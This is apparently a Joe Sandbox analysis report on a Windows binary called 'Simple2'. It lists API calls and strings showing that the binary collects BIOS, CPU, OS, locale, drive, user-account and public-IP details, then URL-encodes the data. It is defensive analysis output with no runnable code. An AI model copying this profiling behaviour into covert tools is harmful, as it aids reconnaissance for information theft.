              • RegCloseKey.ADVAPI32 ref: 00007FF6D5CA43D3
              • RegOpenKeyExA.KERNELBASE ref: 00007FF6D5CA4402
              • RegGetValueA.KERNELBASE ref: 00007FF6D5CA443F
              • RegGetValueA.KERNELBASE ref: 00007FF6D5CA44A7
              • RegCloseKey.KERNELBASE ref: 00007FF6D5CA44E5
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA4539
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA4543
                • Part of subcall function 00007FF6D5CA94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9559
                • Part of subcall function 00007FF6D5CA94E0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9579
                • Part of subcall function 00007FF6D5CA94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9589
                • Part of subcall function 00007FF6D5CA94E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9664
                • Part of subcall function 00007FF6D5CA94E0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA966B
                • Part of subcall function 00007FF6D5CA94E0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9678
                • Part of subcall function 00007FF6D5CA94E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA95D6
                • Part of subcall function 00007FF6D5CA94E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA95FD
                • Part of subcall function 00007FF6D5CA94E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA961E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$memset$Value$CloseOpenU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Osfx@?$basic_ostream@_V12@V?$basic_streambuf@
              • String ID: BaseBoardProduct$DisplayVersion$HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Machine name: $OS display version: $OS name: $Processor name: $ProcessorNameString$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
              • API String ID: 20268565-1502927450
              • Opcode ID: e8a849ff1cf450a5639899f728c5979a0428117e68cf5c9bfb62e6c39eaeade9
              • Instruction ID: 6d1b289db486559f4d1ad44194d48f6e6d8d05ef3e1913976241207885e123f7
              • Opcode Fuzzy Hash: e8a849ff1cf450a5639899f728c5979a0428117e68cf5c9bfb62e6c39eaeade9
              • Instruction Fuzzy Hash: 93914272618A4195E720DB25E8409EE6BB4FF84BC8F80413AEE4D83E69EF7CD915C740

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: Http$CloseHandle$DataOpenRequestmemcpy$AvailableConnectQueryReadReceiveResponseSend_invalid_parameter_noinfo_noreturnmemset
              • String ID: GET$Unable to get IP$WinHTTP/1.0$api.ipify.org
              • API String ID: 849217320-4095685055
              • Opcode ID: e91b885b83f34028d8787c1fb970299661bbbdd800244b3ca7939f8713100669
              • Instruction ID: ce1c8ac4375d5660faa91445c4ab81adb43081d1c742567d7b4972235b877b5f
              • Opcode Fuzzy Hash: e91b885b83f34028d8787c1fb970299661bbbdd800244b3ca7939f8713100669
              • Instruction Fuzzy Hash: 6A616163A1878582EA10DB25E444A6E6BB1FB85FC4F54413AEE4D87F55DF3CE891CB00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1051 7ff6d5ca3e70-7ff6d5ca3ecd GetLocaleInfoA 1052 7ff6d5ca3ecf-7ff6d5ca3eed call 7ff6d5ca9bb0 1051->1052 1053 7ff6d5ca3ef2-7ff6d5ca3f0f 1051->1053 1058 7ff6d5ca3fa9-7ff6d5ca3fd3 call 7ff6d5cab160 1052->1058 1055 7ff6d5ca3f10-7ff6d5ca3f17 1053->1055 1055->1055 1057 7ff6d5ca3f19-7ff6d5ca3f47 call 7ff6d5ca9bb0 GetLocaleInfoA 1055->1057 1063 7ff6d5ca3fd4-7ff6d5ca3fe3 1057->1063 1064 7ff6d5ca3f4d-7ff6d5ca3f75 call 7ff6d5ca9bb0 1057->1064 1065 7ff6d5ca3fe7-7ff6d5ca3fee 1063->1065 1064->1058 1070 7ff6d5ca3f77-7ff6d5ca3f89 1064->1070 1065->1065 1067 7ff6d5ca3ff0-7ff6d5ca4156 call 7ff6d5ca9bb0 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ call 7ff6d5ca94e0 call 7ff6d5caaed0 call 7ff6d5ca94e0 call 7ff6d5caaed0 call 7ff6d5ca94e0 call 7ff6d5ca8760 call 7ff6d5ca7790 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 1065->1067 1090 7ff6d5ca4158-7ff6d5ca416a 1067->1090 1091 7ff6d5ca418d-7ff6d5ca41a9 1067->1091 1072 7ff6d5ca3fa4 call 7ff6d5cab180 1070->1072 1073 7ff6d5ca3f8b-7ff6d5ca3f9e 1070->1073 1072->1058 1073->1072 1074 7ff6d5ca41e0-7ff6d5ca41e6 _invalid_parameter_noinfo_noreturn 1073->1074 1092 7ff6d5ca4188 call 7ff6d5cab180 1090->1092 1093 7ff6d5ca416c-7ff6d5ca417f 1090->1093 1091->1058 1094 7ff6d5ca41af-7ff6d5ca41c1 1091->1094 1092->1091 1093->1092 1095 7ff6d5ca4181-7ff6d5ca4187 _invalid_parameter_noinfo_noreturn 1093->1095 1094->1072 1097 7ff6d5ca41c7-7ff6d5ca41da 1094->1097 1095->1092 1097->1072 1097->1074
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$InfoLocale_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@memcpymemset
              • String ID: Country: $Failed to get locale$Language:
              • API String ID: 3095796567-568146128
              • Opcode ID: 7b8699f20ba1a77a752b81bb2fa3e8e4d266356fc970537a48dc4bdea17b58fc
              • Instruction ID: 3ad39c3e13313226eff8e631b542402b66a2d09e67f1069d0b3e742faafa1bd6
              • Opcode Fuzzy Hash: 7b8699f20ba1a77a752b81bb2fa3e8e4d266356fc970537a48dc4bdea17b58fc
              • Instruction Fuzzy Hash: BDA18273A18B8582EB10CB24E4446AD6B71FB85BD4F504236EB9D83EA8DF7CD955C700

              Control-flow Graph

              APIs
              • GetLogicalDrives.KERNELBASE ref: 00007FF6D5CA37DF
              • memset.VCRUNTIME140 ref: 00007FF6D5CA37F3
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA63CA
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6D5CA63E6
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA6418
                • Part of subcall function 00007FF6D5CA94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9559
                • Part of subcall function 00007FF6D5CA94E0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9579
                • Part of subcall function 00007FF6D5CA94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9589
                • Part of subcall function 00007FF6D5CA94E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9664
                • Part of subcall function 00007FF6D5CA94E0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA966B
                • Part of subcall function 00007FF6D5CA94E0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6D5CA1970), ref: 00007FF6D5CA9678
              • GetDiskFreeSpaceExA.KERNELBASE ref: 00007FF6D5CA3912
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF6D5CA3947
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA39E9
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA39F3
                • Part of subcall function 00007FF6D5CA9260: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6D5CA1C3D), ref: 00007FF6D5CA92A6
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3A28
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3A2F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@D@std@@@1@@DiskDrivesFreeLogicalOsfx@?$basic_ostream@_SpaceV01@_V12@V?$basic_streambuf@memcpymemset
              • String ID: GB$Available Drives:
              • API String ID: 2435906160-4081138596
              • Opcode ID: 4ae56c1bc88ebe4856315a79d37489f665b304091b02ec855f2b4ed4f166cade
              • Instruction ID: e9a8cdefcca711e690dcd81eaf8bb154ad97b88fd75654346cf61381f0d81d8d
              • Opcode Fuzzy Hash: 4ae56c1bc88ebe4856315a79d37489f665b304091b02ec855f2b4ed4f166cade
              • Instruction Fuzzy Hash: 5161E833A18A8181EB10CB65E4447AD6B70FB84BD8F40523AEE4D83EA9DF7CD895C740

              Control-flow Graph

              APIs
              • memset.VCRUNTIME140 ref: 00007FF6D5CA3A8E
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA63CA
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6D5CA63E6
                • Part of subcall function 00007FF6D5CA6390: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA6418
              • NetUserEnum.NETAPI32 ref: 00007FF6D5CA3ACB
              • NetApiBufferFree.NETAPI32 ref: 00007FF6D5CA3BAC
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA3BF4
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA3BFE
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3C2B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BufferD@std@@@1@@EnumFreeUserV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
              • String ID: User:
              • API String ID: 429987867-381282118
              • Opcode ID: 352a133ca664224817b8823e1ddec43fd689b4b5471dc362aa43fd6da9ad8630
              • Instruction ID: 9e3dd3e268ef7e8811dcccc74055c88fc37c9653b07f5e97561c3fda18b66dc8
              • Opcode Fuzzy Hash: 352a133ca664224817b8823e1ddec43fd689b4b5471dc362aa43fd6da9ad8630
              • Instruction Fuzzy Hash: B0515933A08A4186EB10DF65E4906AD7BB1FB84BD4F40413ADE5D83AA9EF38D855CB00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1005 7ff6d5ca1790-7ff6d5ca17e5 memset 1006 7ff6d5ca17e7 1005->1006 1007 7ff6d5ca17ea-7ff6d5ca1824 call 7ff6d5ca8560 1005->1007 1006->1007 1010 7ff6d5ca1826-7ff6d5ca1877 call 7ff6d5ca94e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 1007->1010 1011 7ff6d5ca187c-7ff6d5ca18b7 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z 1007->1011 1021 7ff6d5ca19f4-7ff6d5ca1a3d call 7ff6d5ca70b0 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6d5cab160 1010->1021 1013 7ff6d5ca192e-7ff6d5ca1933 1011->1013 1014 7ff6d5ca18b9-7ff6d5ca18c6 1011->1014 1015 7ff6d5ca1938-7ff6d5ca195b ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z ??7ios_base@std@@QEBA_NXZ 1013->1015 1017 7ff6d5ca1a44-7ff6d5ca1aaa call 7ff6d5caace0 call 7ff6d5ca70b0 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 1014->1017 1018 7ff6d5ca18cc-7ff6d5ca18d3 1014->1018 1019 7ff6d5ca19c8-7ff6d5ca19cf 1015->1019 1020 7ff6d5ca195d-7ff6d5ca198e call 7ff6d5ca94e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 1015->1020 1023 7ff6d5ca18fe-7ff6d5ca1906 call 7ff6d5cab188 1018->1023 1024 7ff6d5ca18d5-7ff6d5ca18dc 1018->1024 1029 7ff6d5ca19d3-7ff6d5ca19f0 1019->1029 1020->1029 1041 7ff6d5ca1990-7ff6d5ca199d 1020->1041 1038 7ff6d5ca1909-7ff6d5ca192c memset 1023->1038 1027 7ff6d5ca1a3e-7ff6d5ca1a43 call 7ff6d5ca1270 1024->1027 1028 7ff6d5ca18e2 call 7ff6d5cab188 1024->1028 1027->1017 1043 7ff6d5ca18e7-7ff6d5ca18ea 1028->1043 1029->1021 1038->1015 1045 7ff6d5ca199f-7ff6d5ca19b2 1041->1045 1046 7ff6d5ca19bb-7ff6d5ca19c6 call 7ff6d5cab180 1041->1046 1047 7ff6d5ca18f0-7ff6d5ca18fc 1043->1047 1048 7ff6d5ca19b4-7ff6d5ca19ba _invalid_parameter_noinfo_noreturn 1043->1048 1045->1046 1045->1048 1046->1029 1047->1038 1048->1046
              APIs
              • memset.VCRUNTIME140 ref: 00007FF6D5CA17DB
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA1843
              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF6D5CA1886
              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF6D5CA189D
              • memset.VCRUNTIME140 ref: 00007FF6D5CA191F
                • Part of subcall function 00007FF6D5CAB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6D5CA1079), ref: 00007FF6D5CAB1A2
              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF6D5CA1943
              • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CA1953
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA197A
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA19B4
              • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA1A01
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA1A0B
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA1A3E
              • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA1A9C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@$V01@$??1?$basic_istream@??6?$basic_ostream@V01@@memset$??1?$basic_ios@??7ios_base@std@@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@Concurrency::cancel_current_taskMbstatet@@@2@V12@V12@_V?$fpos@_invalid_parameter_noinfo_noreturnmalloc
              • String ID: Couldn't open the file$Couldn't read the file
              • API String ID: 2898521299-2967168750
              • Opcode ID: 7e0b5535d5d5b79e204e29fb3b031bc8c20a279b71be13ee0e17ed03b92716b9
              • Instruction ID: d3a8ba336fd001c5878e27c35c940bd68c854187c4230b3ec9e593d7fac67905
              • Opcode Fuzzy Hash: 7e0b5535d5d5b79e204e29fb3b031bc8c20a279b71be13ee0e17ed03b92716b9
              • Instruction Fuzzy Hash: 6C915E33A08B4581EB10CB25E844AAD7BB1FB84FD4F54823ADE5D83AA5DF38D965C700

              Control-flow Graph

              APIs
              • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA157D
              • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6D5CA159C
              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA15D0
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF6D5CA1607
              • isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6D5CA1639
              • ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF6D5CA165E
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6D5CA168C
              • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA16E9
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6D5CA16F3
                • Part of subcall function 00007FF6D5CA9310: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CA935D
                • Part of subcall function 00007FF6D5CA9310: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6D5CA937D
                • Part of subcall function 00007FF6D5CA9310: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6D5CA938D
                • Part of subcall function 00007FF6D5CA9310: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6D5CA93ED
                • Part of subcall function 00007FF6D5CA9310: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6D5CA9416
                • Part of subcall function 00007FF6D5CA9310: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6D5CA944D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$?sputc@?$basic_streambuf@$??6?$basic_ostream@?good@ios_base@std@@V01@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@?flush@?$basic_ostream@_?setw@std@@D@std@@@1@_J@1@_Smanip@_U?$_U?$char_traits@_V12@V21@@V?$basic_streambuf@Vios_base@1@W@std@@@std@@isalnum
              • String ID: _$~
              • API String ID: 2365617078-3740536066
              • Opcode ID: a14253ab657007596ee1eb18ea39cbf631e03ff104c02efb61f706c9878d418d
              • Instruction ID: 861d53b3fa1e7163eb78006f81b5d590a4dcfc32daa7572d17900dd2c438ab5b
              • Opcode Fuzzy Hash: a14253ab657007596ee1eb18ea39cbf631e03ff104c02efb61f706c9878d418d
              • Instruction Fuzzy Hash: DC51403360894586EB10DF15E894AADBB70FB85B89F54403ADF4E83A64EF3CD855C700

              Control-flow Graph

              APIs
              • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D5CA17F7), ref: 00007FF6D5CA85A0
              • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6D5CA85BF
              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA85F1
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6D5CA860C
              • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF6D5CA8632
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6D5CA864F
              • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6D5CA8676
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z.MSVCP140 ref: 00007FF6D5CA869D
              • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF6D5CA86C1
                • Part of subcall function 00007FF6D5CA9AA0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6D5CA9ACD
                • Part of subcall function 00007FF6D5CA9AA0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6D5CA9AE7
                • Part of subcall function 00007FF6D5CA9AA0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6D5CA9B19
